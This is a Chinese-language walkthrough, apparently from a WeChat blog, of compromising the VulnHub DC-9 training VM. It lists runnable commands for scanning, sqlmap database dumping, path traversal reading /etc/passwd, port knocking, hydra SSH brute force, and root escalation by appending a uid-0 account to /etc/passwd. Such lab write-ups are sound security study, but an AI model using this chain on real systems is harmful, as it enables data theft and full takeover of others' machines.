今天实践的是vulnhub的DC-9镜像,
下载地址,https://download.vulnhub.com/dc/DC-9.zip,
用virtualbox导入成功,
做地址扫描,sudo netdiscover -r 192.168.0.0/24,
获取到靶机地址192.168.0.114,
继续做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.114,
获取到靶机有80端口的http服务和22端口的ssh服务,
注意到ssh服务是被过滤的,猜测有端口敲门的情况,
浏览器访问,http://192.168.0.114,在search.php页面发现输入点,
在burpsuite中进行访问,保存请求报文到文件req.txt,
用sqlmap进行数据库暴破,sqlmap -r req.txt --dbs --batch,
获取到Staff和users两个数据库,
继续对Staff数据库进行暴破,
sqlmap -r req.txt -D Staff --dump-all --batch,
获取到admin的密码hash,
在线查到密码明文transorbital1,
继续对users数据库进行暴破,
sqlmap -r req.txt -D users --dump-all --batch,
获取到一堆用户名密码分别保存到user.txt和pass.txt,
浏览器访问http://192.168.0.114/manage.php,
用admin/transorbital1登录,
验证有文件包含漏洞,http://192.168.0.114/welcome.php?file=../../../../../../../etc/passwd,
继续查看敲门的配置,http://192.168.0.114/welcome.php?file=../../../../../../../etc/knockd.conf,
kali攻击机上安装敲门软件,sudo apt install knockd,
敲门,knock 192.168.0.114 7469 8475 9842,
验证敲门成功,nmap -p22 192.168.0.114,
用上面保存的用户名密码文件对ssh进行暴破,
hydra -L user.txt -P pass.txt 192.168.0.114 ssh,
用上面获取到的janitor/Ilovepeepee进行ssh登录,
ssh [email protected],查找到一些新的密码,
把之前密码文件里没有的几个添加进去,
再次进行暴破,hydra -L user.txt -P pass.txt 192.168.0.114 ssh,
获取到新的用户密码fredf/B4-Tru3-001,
切换账户,su fredf,查看sudo权限,sudo -l,
发现/opt/devstuff/dist/test/test有root权限,
在外层文件夹/opt/devstuff发现个test.py,查看内容发现其完成的是把一个文件的内容追加到另一个文件,
准备一个添加root权限账户的脚本,
echo 'hacker:sa3tHJ3/KuYvI:0:0:hacker:/root:/bin/bash' >> /tmp/login,
进入cd /opt/devstuff/dist/test,
执行test程序,sudo ./test /tmp/login /etc/passwd,
切换到hacker账户,id确认是root,
原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之DC-9的实践
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论